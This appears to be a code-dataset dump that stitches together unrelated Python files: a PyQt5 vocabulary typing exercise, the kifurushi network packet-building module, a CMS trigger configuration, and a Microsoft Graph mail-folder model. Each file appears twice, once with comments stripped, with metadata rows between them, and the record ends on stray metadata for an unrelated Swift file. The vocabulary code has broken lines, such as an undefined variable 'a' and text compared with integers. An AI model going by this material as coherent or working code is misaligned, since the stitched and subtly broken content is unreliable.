i.timesCorrect) self.model.appendRow(row) self.n = StarDelegate(review.rd .tableView) headers = ["#", "⭐", "Vocabulary", "Definition", "Pronunciation", "# Correct", "# Missed"] self.model.sort(5) review.rd.tableView.setItemDelegateForColumn(1, self.n) self.model.setHorizontalHeaderLabels(headers) review.rd.tableView.setColumnWidth(0, 40) review.rd.tableView.setModel(self.model) review.rd.tableView.sortByColumn(5) review.show() def changeStar(self, index, isStarred:QStandardItem): if isStarred.text() == 0: isStarred.setText(1) elif isStarred.text() == 1: isStarred.setText(0) def updateSession(self): pass # Read from model # for n in range (0, len(self.model.rowCount)): # if self.model.item(n, 1).text() != : DATABASE_PATH = '../test_data/vocab2.db' database = SqlTools(self.DATABASE_PATH) combinedSet = self.missedWordSet | self.reviewSet rows = (self.startTime, self.win.nameOfCurrentDeck) database.insertSession(rows) database.close() def nextWord(self): self.win.ui.progressBar_typing.setValue(self.wordDeck.cardNum + 1) self.win.ui.label_typingFractionCorrect.clear() print(self.wordDeck.cardNum+1, " of ", len(self.wordDeck.studyList)) if self.wordDeck.cardNum == len(self.wordDeck.studyList): print("END GAME") return elif self.wordDeck.cardNum in self.wordDeck.summaryIndexList: print("OVERVIEW") print("Here are the words most commonly missed:") self.intermission() for i in self.missedWordSet: timesMissed = i.timesAttempted - i.timesCorrect print(i, timesMissed) self.wordDeck.cardNum += 1 self.setStatLabels() self.win.ui.lineEdit_answer.setEnabled(True) self.win.ui.pushButton_notSure_Skip.hide() self.win.ui.lineEdit_answer.setFocus() self.win.ui.lineEdit_answer.clear() self.win.ui.lineEdit_answer.setPlaceholderText("Enter your answer") self.win.ui.pushButton_enter.setText("Don't Know") self.win.ui.label_typingWord.setText(self.wordDeck.studyList[self.wordDeck.cardNum].vocabulary) self.win.ui.pushButton_enter.clicked.disconnect() self.win.ui.pushButton_enter.clicked.connect(self.submitAnswer) try: self.win.ui.lineEdit_answer.textChanged.disconnect() except RuntimeError: print("didnt have connection?") self.win.ui.pushButton_enter.setEnabled(True) def sanitizeInput(self, input_str:str): punct = '!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ ' return input_str.translate({ord(ch): '' for ch in punct}).lower()
45.174672
120
0.652779
from src.StarDelegate import * from src.driverUi.callReview import * from datetime import * from src.utilities.SqlTools import * from PyQt5.QtGui import QStandardItemModel, QStandardItem class TypingExercise(): def __init__(self, main_window, word_deck, parent=None): super(TypingExercise, self).__init__() self.win = main_window self.wordDeck = word_deck self.model = QStandardItemModel() self.missedWordSet = set() self.reviewSet = set() self.startTime = datetime.datetime.now() print("Started session at: ", self.startTime) def resetUi(self): self.setStatLabels() self.win.ui.pushButton_enter.setEnabled(True) self.win.ui.pushButton_enter.clicked.connect(self.submitAnswer) self.win.ui.pushButton_notSure_Skip.clicked.connect(self.nextWord) self.win.ui.pushButton_notSure_Skip.hide() self.win.ui.lineEdit_answer.textEdited['QString'].connect(lambda: self.win.ui.pushButton_enter.setText("Enter")) def setStatLabels(self): cn = self.wordDeck.cardNum timesCorrect = self.wordDeck.studyList[cn].timesCorrect timesMissed = str(self.wordDeck.studyList[cn].timesAttempted - timesCorrect) self.win.ui.label_typingCorrect.setText("Times Correct: " + str(timesCorrect)) self.win.ui.label_typingMissed.setText("Times Missed: " + str(timesMissed)) def buildAnswerList(self, input_str): tempAnsList = [] ansList = [] if ';' in input_str: tempAnsList = input_str.split(';') else: tempAnsList.append(input_str) for ans in tempAnsList: (ans) if len(a) > 0 and a != " ": ansList.append(a) return ansList def compareAnswerLists(self, user_input_list:list, answer_list:list): for u in user_input_list: if u in answer_list: return True return False def submitAnswer(self): currWordData = self.wordDeck.studyList[self.wordDeck.cardNum] userInput = self.win.ui.lineEdit_answer.text() answer = self.wordDeck.studyList[self.wordDeck.cardNum].definition userInputList = self.buildAnswerList(userInput) answerList = self.buildAnswerList(answer) print("user input:",userInputList, " answer:", answerList) if self.compareAnswerLists(userInputList, answerList): self.proceedUi() print("Current word test_data: ", currWordData) self.reviewSet.add(currWordData) else: self.pauseUi(answerList) print("Current word test_data: ", currWordData) self.missedWordSet.add(currWordData) def pauseUi(self, answer_list:list): cn = self.wordDeck.cardNum self.wordDeck.studyList[cn].timesAttempted += 1 self.setStatLabels() self.wordDeck.missedWordList.append(self.wordDeck.studyList[cn]) self.win.ui.lineEdit_answer.textChanged.connect(lambda: self.unpauseUi(answer_list)) percentLabelStr = self.wordDeck.calcPercentageCorrect() answerLabelStr = self.wordDeck.studyList[cn].definition self.win.ui.label_typingFractionCorrect.setText("%" + str(percentLabelStr)) self.win.ui.pushButton_notSure_Skip.show() self.win.ui.lineEdit_answer.clear() self.win.ui.label_typingWord.setText("Oops! Correct answer is:\n" + answerLabelStr) self.win.ui.pushButton_notSure_Skip.setText("I was right") self.win.ui.pushButton_notSure_Skip.clicked.disconnect() self.win.ui.pushButton_notSure_Skip.clicked.connect(self.wasRight) self.win.ui.lineEdit_answer.setPlaceholderText("Enter the correct answer") def wasRight(self): cn = self.wordDeck.cardNum print(self.wordDeck.studyList[cn]) self.wordDeck.studyList[cn].timesAttempted -= 1 print(self.wordDeck.studyList[cn]) self.nextWord() def unpauseUi(self, answer_list:str): userInputList = self.sanitizeInput(self.win.ui.lineEdit_answer.text()) if userInputList in answer_list: print("ui unpauesd") self.win.ui.pushButton_enter.setText("Enter") self.win.ui.pushButton_enter.setEnabled(True) self.win.ui.pushButton_enter.clicked.disconnect() self.win.ui.pushButton_enter.clicked.connect(self.nextWord) else: self.win.ui.pushButton_enter.setEnabled(False) def proceedUi(self): cn = self.wordDeck.cardNum answer = self.wordDeck.studyList[cn].definition self.wordDeck.studyList[cn].timesCorrect += 1 self.wordDeck.studyList[cn].timesAttempted += 1 self.setStatLabels() percent = self.wordDeck.calcPercentageCorrect() self.win.ui.lineEdit_answer.clear() self.win.ui.label_typingFractionCorrect.setText("%" + str(percent)) self.win.ui.label_typingWord.setText("Correct!\n" + answer) self.win.ui.pushButton_enter.setText("Continue") self.win.ui.lineEdit_answer.setPlaceholderText("Press Enter to continue") self.win.ui.lineEdit_answer.setDisabled(True) self.win.ui.pushButton_enter.clicked.disconnect() self.win.ui.pushButton_enter.clicked.connect(self.nextWord) def intermission(self): review = ReviewDialog(self.win) combinedSet = self.missedWordSet | self.reviewSet self.model.clear() for i in combinedSet: cardNum = QStandardItem(str(i.cardNum)) timesMissed = i.timesAttempted - i.timesCorrect isStarred = QStandardItem(str(i.isStarred)) vocabulary = QStandardItem(i.vocabulary) definition = QStandardItem(i.definition) pronunciation = QStandardItem(i.pronunciation) timesCorrect = QStandardItem(str(i.timesCorrect)) timesMissed = QStandardItem(str(timesMissed)) row = [cardNum, isStarred, vocabulary, definition, pronunciation, timesCorrect, timesMissed] print(i.timesAttempted, i.timesCorrect) self.model.appendRow(row) self.n = StarDelegate(review.rd .tableView) headers = ["#", "⭐", "Vocabulary", "Definition", "Pronunciation", "# Correct", "# Missed"] self.model.sort(5) review.rd.tableView.setItemDelegateForColumn(1, self.n) self.model.setHorizontalHeaderLabels(headers) review.rd.tableView.setColumnWidth(0, 40) review.rd.tableView.setModel(self.model) review.rd.tableView.sortByColumn(5) review.show() def changeStar(self, index, isStarred:QStandardItem): if isStarred.text() == 0: isStarred.setText(1) elif isStarred.text() == 1: isStarred.setText(0) def updateSession(self): pass DATABASE_PATH = '../test_data/vocab2.db' database = SqlTools(self.DATABASE_PATH) combinedSet = self.missedWordSet | self.reviewSet rows = (self.startTime, self.win.nameOfCurrentDeck) database.insertSession(rows) database.close() def nextWord(self): self.win.ui.progressBar_typing.setValue(self.wordDeck.cardNum + 1) self.win.ui.label_typingFractionCorrect.clear() print(self.wordDeck.cardNum+1, " of ", len(self.wordDeck.studyList)) if self.wordDeck.cardNum == len(self.wordDeck.studyList): print("END GAME") return elif self.wordDeck.cardNum in self.wordDeck.summaryIndexList: print("OVERVIEW") print("Here are the words most commonly missed:") self.intermission() for i in self.missedWordSet: timesMissed = i.timesAttempted - i.timesCorrect print(i, timesMissed) self.wordDeck.cardNum += 1 self.setStatLabels() self.win.ui.lineEdit_answer.setEnabled(True) self.win.ui.pushButton_notSure_Skip.hide() self.win.ui.lineEdit_answer.setFocus() self.win.ui.lineEdit_answer.clear() self.win.ui.lineEdit_answer.setPlaceholderText("Enter your answer") self.win.ui.pushButton_enter.setText("Don't Know") self.win.ui.label_typingWord.setText(self.wordDeck.studyList[self.wordDeck.cardNum].vocabulary) self.win.ui.pushButton_enter.clicked.disconnect() self.win.ui.pushButton_enter.clicked.connect(self.submitAnswer) try: self.win.ui.lineEdit_answer.textChanged.disconnect() except RuntimeError: print("didnt have connection?") self.win.ui.pushButton_enter.setEnabled(True) def sanitizeInput(self, input_str:str): punct = '!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ ' return input_str.translate({ord(ch): '' for ch in punct}).lower()
true
true
f728f20365e4e5bd9201c8a3f0be78904dc5cadc
12,097
py
Python
kifurushi/packet.py
lewoudar/kifurushi
996e631933f55a96dd7a23360b693731414bd944
[ "Apache-2.0" ]
null
null
null
kifurushi/packet.py
lewoudar/kifurushi
996e631933f55a96dd7a23360b693731414bd944
[ "Apache-2.0" ]
4
2021-08-18T16:07:47.000Z
2021-12-08T17:21:50.000Z
kifurushi/packet.py
lewoudar/kifurushi
996e631933f55a96dd7a23360b693731414bd944
[ "Apache-2.0" ]
null
null
null
"""This module defines the base Packet class and helper functions.""" import enum import inspect from copy import copy from typing import Iterable, Dict, Union, Any, Callable, List, Type from kifurushi.utils.network import hexdump from .abc import Field, CommonField from .fields import BitsField, FieldPart, ConditionalField class Packet: __fields__: Iterable[Field] = None def __init__(self, **kwargs): self._fields = [field.clone() for field in self.__fields__] self._field_mapping = self._create_field_mapping(self._fields) self._check_arguments(kwargs) value_mapping = {**self._get_default_values(), **kwargs} for name, value in value_mapping.items(): setattr(self, name, value) @staticmethod def _create_field_mapping(fields: List[Field]) -> Dict[str, Field]: error_message = 'you already have a field with name {name}' field_mapping = {} for field in fields: if isinstance(field, BitsField): for field_part in field.parts: if field_part.name in field_mapping: raise AttributeError(error_message.format(name=field_part.name)) field_mapping[field_part.name] = field else: if field.name in field_mapping: raise AttributeError(error_message.format(name=field.name)) field_mapping[field.name] = field return field_mapping def _check_arguments(self, arguments: Dict[str, Any]) -> None: for argument in arguments: if argument not in self._field_mapping: raise AttributeError(f'there is no attribute with name {argument}') def _get_default_values(self) -> Dict[str, Union[str, int]]: result = {} for name, field in self._field_mapping.items(): if isinstance(field, BitsField): result[name] = field[name].value else: result[name] = field.value return result @staticmethod def _set_packet_attributes(packet: 'Packet') -> None: for name, field in packet._field_mapping.items(): value = field[name].value if isinstance(field, BitsField) else field.value setattr(packet, name, value) @staticmethod def _set_packet_attribute(field: Field, packet: 'Packet') -> None: if isinstance(field, BitsField): for field_part in field.parts: setattr(packet, field_part.name, field_part.value) else: setattr(packet, field.name, field.value) @classmethod def from_bytes(cls, data: bytes) -> 'Packet': """ Creates a packet from bytes and returns it. **Parameters:** **data:** The raw bytes used to construct a packet object. """ packet = cls() for field in packet._fields: data = field.compute_value(data, packet) # we need to set directly the field after it is parsed, so that next fields depending on # previous fields can check whether or not they need to parse data cls._set_packet_attribute(field, packet) return packet @classmethod def random_packet(cls) -> 'Packet': """Returns a packet with fields having random values.""" packet = cls() for field in packet._fields: field.value = field.random_value() cls._set_packet_attributes(packet) return packet @property def fields(self) -> List[Field]: """Returns a copy of the list of fields composing the packet object.""" return [field.clone() for field in self._fields] @staticmethod def _set_enum_field( field: Union[CommonField, FieldPart], value: Union[int, str, enum.Enum], set_attr: Callable[[str, Any], None] ) -> None: if isinstance(value, str): found = False if field.enumeration is not None: for key, name in field.enumeration.items(): if name == value: field.value = key found = True break if not found: raise ValueError(f'{field.name} has no value represented by {value}') elif isinstance(value, enum.Enum): field.value = value.value else: field.value = value set_attr(field.name, field.value) def __setattr__(self, name: str, value: Union[int, str, enum.Enum]): super_set_attr = super().__setattr__ # if name does not represent a field, we directly call the parent __setattr__ method without # further processing if name in ['_fields', '_field_mapping'] or name not in self._field_mapping: super_set_attr(name, value) return field = self._field_mapping[name] if isinstance(field, BitsField): self._set_enum_field(field[name], value, super_set_attr) elif isinstance(field, CommonField) and hasattr(field, '_enumeration'): self._set_enum_field(field, value, super_set_attr) else: field.value = value super_set_attr(name, value) @property def raw(self) -> bytes: """Returns bytes corresponding to what will be sent on the network.""" return b''.join(field.raw(self) for field in self._fields) def __bytes__(self): return self.raw @property def hexdump(self) -> str: """Returns tcpdump / wireshark like hexadecimal view of the packet.""" return hexdump(self.raw) @property def all_fields_are_computed(self) -> bool: """Returns True if all packet fields have been computed using from_bytes class method, False otherwise.""" for field in self._fields: if not field.value_was_computed: if isinstance(field, ConditionalField) and not field.condition(self): continue else: return False return True def __eq__(self, other: Any): if not isinstance(other, self.__class__): raise NotImplementedError return self.raw == other.raw def __ne__(self, other: Any): return not self.__eq__(other) def clone(self) -> 'Packet': """Returns a copy of the packet.""" cloned_packet = copy(self) cloned_fields = self.fields cloned_packet._fields = cloned_fields cloned_packet._field_mapping = self._create_field_mapping(cloned_fields) return cloned_packet def evolve(self, **kwargs) -> 'Packet': """ Returns a new packet with attributes updated by arguments passed as input. **Parameters:** **kwargs:** keyword-only arguments representing packet attributes with the value to set on them. """ self._check_arguments(kwargs) cloned_packet = self.clone() for field, value in kwargs.items(): setattr(cloned_packet, field, value) return cloned_packet def __repr__(self): representation = f'<{self.__class__.__name__}: ' template = '{name}={value}, ' for field in self._fields: # we don't represent fields where condition is not true if isinstance(field, ConditionalField) and not field.condition(self): continue if isinstance(field, BitsField): for field_part in field.parts: value = hex(field_part.value) if field_part.hex else field_part.value representation += template.format(name=field_part.name, value=value) else: value = hex(field.value) if (hasattr(field, 'hex') and field.hex) else field.value representation += template.format(name=field.name, value=value) representation = representation[:-2] return f'{representation}>' def show(self) -> None: """Prints a clarified state of packet with type, current and default values of every field.""" representation = '' template = '{name} : {type} = {value} ({default})\n' names = sorted(self._field_mapping.keys(), key=len) max_length = len(names[-1]) for field in self._fields: # we don't represent fields where condition is not true if isinstance(field, ConditionalField) and not field.condition(self): continue if isinstance(field, ConditionalField): class_name = getattr(field, '_field').__class__.__name__ else: class_name = field.__class__.__name__ if isinstance(field, BitsField): for field_part in field.parts: value = hex(field_part.value) if field_part.hex else field_part.value default = hex(field_part.default) if field_part.hex else field_part.default representation += template.format( name=field_part.name.ljust(max_length), type=f'{field_part.__class__.__name__} of {class_name}', value=value, default=default ) else: value = hex(field.value) if field.hex else field.value default = hex(field.default) if field.hex else field.default representation += template.format( name=field.name.ljust(max_length), type=class_name, value=value, default=default ) print(representation, end='') def create_packet_class(name: str, fields: Iterable[Field]) -> type(Packet): """ Creates and returns a packet class. **Parameters:** **name:** The name of the class to create. **fields:** An iterable of fields that compose the packet. """ if not isinstance(name, str): raise TypeError(f'class name must be a string but you provided {name}') if not fields: raise ValueError('the list of fields must not be empty') for field in fields: if not isinstance(field, Field): raise TypeError(f'each item in the list must be a Field object but you provided {field}') return type(name, (Packet,), {'__fields__': fields}) def extract_layers(data: bytes, *args: Type[Packet]) -> List[Packet]: """ Extract various packet from raw binary data. For example, imagine you want to send an [ICMP](https://en.wikipedia.org/wiki/Internet_Control_Message_Protocol) ping request. You will probably need to create two Packet classes, ICMP and IP and send the sum of them over the network i.e something like `socket.sendto(ICMP(...).raw + IP(...).raw, address)`. Now you want to get the ICMP reply, how to get it? You can't use `ICMP.from_bytes` because you will have IP and ICMP returned all at once! The solution is to use *extract_layers* with code like the following: `icmp, ip = extract_layers(socket.recvfrom(1024)[0], ICMP, IP)` ** Parameters: ** * **data:** The raw bytes to parse. * **args:** A list of Packet layers used to reconstruct the expected layers. You must provide at least one class, if not, you will get an error. """ if not isinstance(data, bytes): raise TypeError(f'data must be bytes but you provided {data}') if not args: raise ValueError('you must provide at least one Packet subclass to use for layer extraction') for packet_class in args: if not inspect.isclass(packet_class) or not issubclass(packet_class, Packet): raise TypeError( f'all arguments following the given data must be subclasses' f' of Packet class but you provided {packet_class}' ) packets = [] cursor = 0 for packet_class in args: packet = packet_class.from_bytes(data[cursor:]) cursor = len(packet.raw) packets.append(packet) return packets
38.160883
116
0.614698
import enum import inspect from copy import copy from typing import Iterable, Dict, Union, Any, Callable, List, Type from kifurushi.utils.network import hexdump from .abc import Field, CommonField from .fields import BitsField, FieldPart, ConditionalField class Packet: __fields__: Iterable[Field] = None def __init__(self, **kwargs): self._fields = [field.clone() for field in self.__fields__] self._field_mapping = self._create_field_mapping(self._fields) self._check_arguments(kwargs) value_mapping = {**self._get_default_values(), **kwargs} for name, value in value_mapping.items(): setattr(self, name, value) @staticmethod def _create_field_mapping(fields: List[Field]) -> Dict[str, Field]: error_message = 'you already have a field with name {name}' field_mapping = {} for field in fields: if isinstance(field, BitsField): for field_part in field.parts: if field_part.name in field_mapping: raise AttributeError(error_message.format(name=field_part.name)) field_mapping[field_part.name] = field else: if field.name in field_mapping: raise AttributeError(error_message.format(name=field.name)) field_mapping[field.name] = field return field_mapping def _check_arguments(self, arguments: Dict[str, Any]) -> None: for argument in arguments: if argument not in self._field_mapping: raise AttributeError(f'there is no attribute with name {argument}') def _get_default_values(self) -> Dict[str, Union[str, int]]: result = {} for name, field in self._field_mapping.items(): if isinstance(field, BitsField): result[name] = field[name].value else: result[name] = field.value return result @staticmethod def _set_packet_attributes(packet: 'Packet') -> None: for name, field in packet._field_mapping.items(): value = field[name].value if isinstance(field, BitsField) else field.value setattr(packet, name, value) @staticmethod def _set_packet_attribute(field: Field, packet: 'Packet') -> None: if isinstance(field, BitsField): for field_part in field.parts: setattr(packet, field_part.name, field_part.value) else: setattr(packet, field.name, field.value) @classmethod def from_bytes(cls, data: bytes) -> 'Packet': packet = cls() for field in packet._fields: data = field.compute_value(data, packet) cls._set_packet_attribute(field, packet) return packet @classmethod def random_packet(cls) -> 'Packet': packet = cls() for field in packet._fields: field.value = field.random_value() cls._set_packet_attributes(packet) return packet @property def fields(self) -> List[Field]: return [field.clone() for field in self._fields] @staticmethod def _set_enum_field( field: Union[CommonField, FieldPart], value: Union[int, str, enum.Enum], set_attr: Callable[[str, Any], None] ) -> None: if isinstance(value, str): found = False if field.enumeration is not None: for key, name in field.enumeration.items(): if name == value: field.value = key found = True break if not found: raise ValueError(f'{field.name} has no value represented by {value}') elif isinstance(value, enum.Enum): field.value = value.value else: field.value = value set_attr(field.name, field.value) def __setattr__(self, name: str, value: Union[int, str, enum.Enum]): super_set_attr = super().__setattr__ if name in ['_fields', '_field_mapping'] or name not in self._field_mapping: super_set_attr(name, value) return field = self._field_mapping[name] if isinstance(field, BitsField): self._set_enum_field(field[name], value, super_set_attr) elif isinstance(field, CommonField) and hasattr(field, '_enumeration'): self._set_enum_field(field, value, super_set_attr) else: field.value = value super_set_attr(name, value) @property def raw(self) -> bytes: return b''.join(field.raw(self) for field in self._fields) def __bytes__(self): return self.raw @property def hexdump(self) -> str: return hexdump(self.raw) @property def all_fields_are_computed(self) -> bool: for field in self._fields: if not field.value_was_computed: if isinstance(field, ConditionalField) and not field.condition(self): continue else: return False return True def __eq__(self, other: Any): if not isinstance(other, self.__class__): raise NotImplementedError return self.raw == other.raw def __ne__(self, other: Any): return not self.__eq__(other) def clone(self) -> 'Packet': cloned_packet = copy(self) cloned_fields = self.fields cloned_packet._fields = cloned_fields cloned_packet._field_mapping = self._create_field_mapping(cloned_fields) return cloned_packet def evolve(self, **kwargs) -> 'Packet': self._check_arguments(kwargs) cloned_packet = self.clone() for field, value in kwargs.items(): setattr(cloned_packet, field, value) return cloned_packet def __repr__(self): representation = f'<{self.__class__.__name__}: ' template = '{name}={value}, ' for field in self._fields: if isinstance(field, ConditionalField) and not field.condition(self): continue if isinstance(field, BitsField): for field_part in field.parts: value = hex(field_part.value) if field_part.hex else field_part.value representation += template.format(name=field_part.name, value=value) else: value = hex(field.value) if (hasattr(field, 'hex') and field.hex) else field.value representation += template.format(name=field.name, value=value) representation = representation[:-2] return f'{representation}>' def show(self) -> None: representation = '' template = '{name} : {type} = {value} ({default})\n' names = sorted(self._field_mapping.keys(), key=len) max_length = len(names[-1]) for field in self._fields: # we don't represent fields where condition is not true if isinstance(field, ConditionalField) and not field.condition(self): continue if isinstance(field, ConditionalField): class_name = getattr(field, '_field').__class__.__name__ else: class_name = field.__class__.__name__ if isinstance(field, BitsField): for field_part in field.parts: value = hex(field_part.value) if field_part.hex else field_part.value default = hex(field_part.default) if field_part.hex else field_part.default representation += template.format( name=field_part.name.ljust(max_length), type=f'{field_part.__class__.__name__} of {class_name}', value=value, default=default ) else: value = hex(field.value) if field.hex else field.value default = hex(field.default) if field.hex else field.default representation += template.format( name=field.name.ljust(max_length), type=class_name, value=value, default=default ) print(representation, end='') def create_packet_class(name: str, fields: Iterable[Field]) -> type(Packet): if not isinstance(name, str): raise TypeError(f'class name must be a string but you provided {name}') if not fields: raise ValueError('the list of fields must not be empty') for field in fields: if not isinstance(field, Field): raise TypeError(f'each item in the list must be a Field object but you provided {field}') return type(name, (Packet,), {'__fields__': fields}) def extract_layers(data: bytes, *args: Type[Packet]) -> List[Packet]: if not isinstance(data, bytes): raise TypeError(f'data must be bytes but you provided {data}') if not args: raise ValueError('you must provide at least one Packet subclass to use for layer extraction') for packet_class in args: if not inspect.isclass(packet_class) or not issubclass(packet_class, Packet): raise TypeError( f'all arguments following the given data must be subclasses' f' of Packet class but you provided {packet_class}' ) packets = [] cursor = 0 for packet_class in args: packet = packet_class.from_bytes(data[cursor:]) cursor = len(packet.raw) packets.append(packet) return packets
true
true
f728f2be183bdd9218b7e27cbee79e9189e0e109
379
py
Python
HLTrigger/Configuration/python/HLT_75e33/modules/hltEgammaClusterShapeL1Seeded_cfi.py
PKUfudawei/cmssw
8fbb5ce74398269c8a32956d7c7943766770c093
[ "Apache-2.0" ]
1
2021-11-30T16:24:46.000Z
2021-11-30T16:24:46.000Z
HLTrigger/Configuration/python/HLT_75e33/modules/hltEgammaClusterShapeL1Seeded_cfi.py
PKUfudawei/cmssw
8fbb5ce74398269c8a32956d7c7943766770c093
[ "Apache-2.0" ]
4
2021-11-29T13:57:56.000Z
2022-03-29T06:28:36.000Z
HLTrigger/Configuration/python/HLT_75e33/modules/hltEgammaClusterShapeL1Seeded_cfi.py
PKUfudawei/cmssw
8fbb5ce74398269c8a32956d7c7943766770c093
[ "Apache-2.0" ]
1
2021-11-30T16:16:05.000Z
2021-11-30T16:16:05.000Z
import FWCore.ParameterSet.Config as cms hltEgammaClusterShapeL1Seeded = cms.EDProducer("EgammaHLTClusterShapeProducer", ecalRechitEB = cms.InputTag("hltRechitInRegionsECAL","EcalRecHitsEB"), ecalRechitEE = cms.InputTag("hltRechitInRegionsECAL","EcalRecHitsEE"), isIeta = cms.bool(True), recoEcalCandidateProducer = cms.InputTag("hltEgammaCandidatesL1Seeded") )
42.111111
79
0.796834
import FWCore.ParameterSet.Config as cms hltEgammaClusterShapeL1Seeded = cms.EDProducer("EgammaHLTClusterShapeProducer", ecalRechitEB = cms.InputTag("hltRechitInRegionsECAL","EcalRecHitsEB"), ecalRechitEE = cms.InputTag("hltRechitInRegionsECAL","EcalRecHitsEE"), isIeta = cms.bool(True), recoEcalCandidateProducer = cms.InputTag("hltEgammaCandidatesL1Seeded") )
true
true
f728f3fe761e36ce0b53a9bcf5b8cfaff9cb2a53
3,907
py
Python
src/users/models/componentsschemasmicrosoft_graph_mailfolderallof1.py
peombwa/Sample-Graph-Python-Client
3396f531fbe6bb40a740767c4e31aee95a3b932e
[ "MIT" ]
null
null
null
src/users/models/componentsschemasmicrosoft_graph_mailfolderallof1.py
peombwa/Sample-Graph-Python-Client
3396f531fbe6bb40a740767c4e31aee95a3b932e
[ "MIT" ]
null
null
null
src/users/models/componentsschemasmicrosoft_graph_mailfolderallof1.py
peombwa/Sample-Graph-Python-Client
3396f531fbe6bb40a740767c4e31aee95a3b932e
[ "MIT" ]
null
null
null
# coding=utf-8 # -------------------------------------------------------------------------- # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. # -------------------------------------------------------------------------- from msrest.serialization import Model class ComponentsschemasmicrosoftGraphMailfolderallof1(Model): """mailFolder. :param display_name: :type display_name: str :param parent_folder_id: :type parent_folder_id: str :param child_folder_count: :type child_folder_count: int :param unread_item_count: :type unread_item_count: int :param total_item_count: :type total_item_count: int :param well_known_name: :type well_known_name: str :param single_value_extended_properties: :type single_value_extended_properties: list[~users.models.MicrosoftgraphsingleValueLegacyExtendedProperty] :param multi_value_extended_properties: :type multi_value_extended_properties: list[~users.models.MicrosoftgraphmultiValueLegacyExtendedProperty] :param messages: :type messages: list[~users.models.Microsoftgraphmessage] :param message_rules: :type message_rules: list[~users.models.MicrosoftgraphmessageRule] :param child_folders: :type child_folders: list[~users.models.MicrosoftgraphmailFolder] :param user_configurations: :type user_configurations: list[~users.models.MicrosoftgraphuserConfiguration] """ _validation = { 'child_folder_count': {'maximum': 2147483647, 'minimum': -2147483648}, 'unread_item_count': {'maximum': 2147483647, 'minimum': -2147483648}, 'total_item_count': {'maximum': 2147483647, 'minimum': -2147483648}, } _attribute_map = { 'display_name': {'key': 'displayName', 'type': 'str'}, 'parent_folder_id': {'key': 'parentFolderId', 'type': 'str'}, 'child_folder_count': {'key': 'childFolderCount', 'type': 'int'}, 'unread_item_count': {'key': 'unreadItemCount', 'type': 'int'}, 'total_item_count': {'key': 'totalItemCount', 'type': 'int'}, 'well_known_name': {'key': 'wellKnownName', 'type': 'str'}, 'single_value_extended_properties': {'key': 'singleValueExtendedProperties', 'type': '[MicrosoftgraphsingleValueLegacyExtendedProperty]'}, 'multi_value_extended_properties': {'key': 'multiValueExtendedProperties', 'type': '[MicrosoftgraphmultiValueLegacyExtendedProperty]'}, 'messages': {'key': 'messages', 'type': '[Microsoftgraphmessage]'}, 'message_rules': {'key': 'messageRules', 'type': '[MicrosoftgraphmessageRule]'}, 'child_folders': {'key': 'childFolders', 'type': '[MicrosoftgraphmailFolder]'}, 'user_configurations': {'key': 'userConfigurations', 'type': '[MicrosoftgraphuserConfiguration]'}, } def __init__(self, display_name=None, parent_folder_id=None, child_folder_count=None, unread_item_count=None, total_item_count=None, well_known_name=None, single_value_extended_properties=None, multi_value_extended_properties=None, messages=None, message_rules=None, child_folders=None, user_configurations=None): super(ComponentsschemasmicrosoftGraphMailfolderallof1, self).__init__() self.display_name = display_name self.parent_folder_id = parent_folder_id self.child_folder_count = child_folder_count self.unread_item_count = unread_item_count self.total_item_count = total_item_count self.well_known_name = well_known_name self.single_value_extended_properties = single_value_extended_properties self.multi_value_extended_properties = multi_value_extended_properties self.messages = messages self.message_rules = message_rules self.child_folders = child_folders self.user_configurations = user_configurations
50.089744
317
0.699514
from msrest.serialization import Model class ComponentsschemasmicrosoftGraphMailfolderallof1(Model): _validation = { 'child_folder_count': {'maximum': 2147483647, 'minimum': -2147483648}, 'unread_item_count': {'maximum': 2147483647, 'minimum': -2147483648}, 'total_item_count': {'maximum': 2147483647, 'minimum': -2147483648}, } _attribute_map = { 'display_name': {'key': 'displayName', 'type': 'str'}, 'parent_folder_id': {'key': 'parentFolderId', 'type': 'str'}, 'child_folder_count': {'key': 'childFolderCount', 'type': 'int'}, 'unread_item_count': {'key': 'unreadItemCount', 'type': 'int'}, 'total_item_count': {'key': 'totalItemCount', 'type': 'int'}, 'well_known_name': {'key': 'wellKnownName', 'type': 'str'}, 'single_value_extended_properties': {'key': 'singleValueExtendedProperties', 'type': '[MicrosoftgraphsingleValueLegacyExtendedProperty]'}, 'multi_value_extended_properties': {'key': 'multiValueExtendedProperties', 'type': '[MicrosoftgraphmultiValueLegacyExtendedProperty]'}, 'messages': {'key': 'messages', 'type': '[Microsoftgraphmessage]'}, 'message_rules': {'key': 'messageRules', 'type': '[MicrosoftgraphmessageRule]'}, 'child_folders': {'key': 'childFolders', 'type': '[MicrosoftgraphmailFolder]'}, 'user_configurations': {'key': 'userConfigurations', 'type': '[MicrosoftgraphuserConfiguration]'}, } def __init__(self, display_name=None, parent_folder_id=None, child_folder_count=None, unread_item_count=None, total_item_count=None, well_known_name=None, single_value_extended_properties=None, multi_value_extended_properties=None, messages=None, message_rules=None, child_folders=None, user_configurations=None): super(ComponentsschemasmicrosoftGraphMailfolderallof1, self).__init__() self.display_name = display_name self.parent_folder_id = parent_folder_id self.child_folder_count = child_folder_count self.unread_item_count = unread_item_count self.total_item_count = total_item_count self.well_known_name = well_known_name self.single_value_extended_properties = single_value_extended_properties self.multi_value_extended_properties = multi_value_extended_properties self.messages = messages self.message_rules = message_rules self.child_folders = child_folders self.user_configurations = user_configurations
true
true
f728f51808701cc3a00f24a9a0c6b2a2c87aa602
28,011
py
Python
utils/build_swift/tests/expected_options.py
JiarenWang/swift
ed104a81342d65328ec2ab20bde2399d22858f07
[ "Apache-2.0" ]
1
2018-10-12T17:49:57.000Z
2018-10-12T17:49:57.000Z
utils/build_swift/tests/expected_options.py
stevendinggang/swift
95aeaf7b64c9df798c3b0064129f03e5b97e0e80
[ "Apache-2.0" ]
1
2019-01-16T23:21:36.000Z
2019-01-16T23:21:36.000Z
utils/build_swift/tests/expected_options.py
stevendinggang/swift
95aeaf7b64c9df798c3b0064129f03e5b97e0e80
[ "Apache-2.0" ]
2
2017-07-20T10:09:21.000Z
2018-10-15T13:09:30.000Z
